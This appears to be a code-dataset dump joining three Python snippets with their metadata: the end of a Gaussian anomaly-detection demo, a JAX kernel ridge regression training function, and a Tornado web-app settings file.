    quad = np.sum(diff * np.dot(np.linalg.pinv(E), diff.T).T, axis=1)
    # normalize once per example; the previous per-column divide applied the
    # constant n times and used det(E) where sqrt(det(E)) belongs
    norm = np.power(2 * np.pi, n / 2) * np.sqrt(np.linalg.det(E))
    return np.exp(-0.5 * quad) / norm
###################
# MAIN ALGORITHM
def main(unused_argv):
# input to the algorithm
m=6 # number of examples
m_test=3000 # number of tests
    n=2 # number of features for each example; it is 2 here so we can plot directly
x_orig=np.random.normal(size=[m,n]) # generate training data
x_test_orig=np.random.rand(m_test,n) # generate test data
x=preprocess_data(x_orig) # mean shift normalize
x_test=preprocess_data(x_test_orig)*2 # mean shift normalize
u=np.sum(x,axis=0)/m # mean
sigma2=np.sum(np.square(x-u),axis=0)/m # variance
p=probability(x_test, u, sigma2) # the probability that an example is an anomaly or not
E=np.dot((x-u).T,(x-u))/m # covariance matrix
#E=np.cov(x.T) # covariance matrix
p_multi=probability_multivariate(x_test, u, E) # the probability that an example is an anomaly or not
epsilon=0.182 # hand-picked threshold for flagging an example as an anomaly
# Plotting
plt.figure(1)
# plot predictions using gaussian distribution
plt.subplot(211)
    plt.plot(x_test[p>=epsilon,0], x_test[p>=epsilon,1], "y+") # normal points
plt.plot(x_test[p<epsilon,0], x_test[p<epsilon,1], "rx") # anomalous points
plt.plot(x[:,0], x[:,1], "bo") # data points
# plot predictions using multivariate gaussian distribution
plt.subplot(212)
plt.plot(x_test[p_multi>=epsilon,0], x_test[p_multi>=epsilon,1], "y+")
plt.plot(x_test[p_multi<epsilon,0], x_test[p_multi<epsilon,1], "rx")
plt.plot(x[:,0], x[:,1], "bo")
plt.show()
if __name__ == "__main__":
    main(main) | en | 0.645664 | ################# # DATA PROCESSING FUNCTIONS # Normalize each column of the matrix to be in the range [low, high] # Normalizes and shift the data #normalize the data # np.linalg.norm(x, axis=0) # shift the data ################# # KERNEL FUNCTIONS # Gaussian # Multivariate Gaussian ################### # MAIN ALGORITHM # input to the algorithm # number of examples # number of tests # number of features for each example. Here is 2 so we can plot directly. # generate training data # generate test data # mean shift normalize # mean shift normalize # mean # variance # the probability that an example is an anomaly or not # covariance matrix #E=np.cov(x.T) # covariance matrix # the probability that an example is an anomaly or not # hand-picked threshold for flagging an example as an anomaly # Plotting # plot predictions using gaussian distribution # normal points # anomalous points # data points # plot predictions using multivariate gaussian distribution | 3.106913 | 3 |
src/jacho/recurrent_kernel/train.py | GJBoth/jacho | 4 | 6616849 | import jax
import jax.numpy as jnp
def train(model, params, data, *, alpha):
K_train, model_state = model.apply(params, data, method=model.train_kernel)
    # add the regularization term alpha to the kernel diagonal
    # (.at[...].add() replaces the removed jax.ops.index_add)
    K_train = K_train.at[jnp.diag_indices(K_train.shape[0])].add(alpha)
# Calculating W_out; maybe use SVD through linalg?
c, low = jax.scipy.linalg.cho_factor(K_train, check_finite=False)
W_out = jax.scipy.linalg.cho_solve(
(c, low), data[-K_train.shape[0] :], check_finite=False
)
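    # The factor/solve pair above is kernel ridge regression,
    # W_out = (K + alpha*I)^-1 y, computed without forming the inverse.
    # Hypothetical usage (model, params and data come from the caller):
    #   W_out, *state = train(model, params, data, alpha=1e-6)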
return (W_out, *model_state)
| en | 0.913584 | # Calculating W_out; maybe use SVD through linalg? | 2.256417 | 2 |
App/settings.py | passed-by/WeatherTornado | 0 | 6616850 | # settings.py: project configuration
import os
from tornado.options import define, options
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
define('port', default=8082, type=int)
define('debug', default=True, type=bool)
app_settings = {
"debug": options.debug,
"template_path": os.path.join(BASE_DIR, 'templates'),
"static_path": os.path.join(BASE_DIR, 'static'),
}
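# Hypothetical wiring in the app entry point (names assumed, not part of
# this file):
#   from tornado.options import options, parse_command_line
#   parse_command_line()  # e.g. python server.py --port=8082 --debug=false
#   app = tornado.web.Application(handlers, **app_settings)
#   app.listen(options.port)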
| en | 0.411205 | # settings.py: project configuration | 1.901587 | 2 |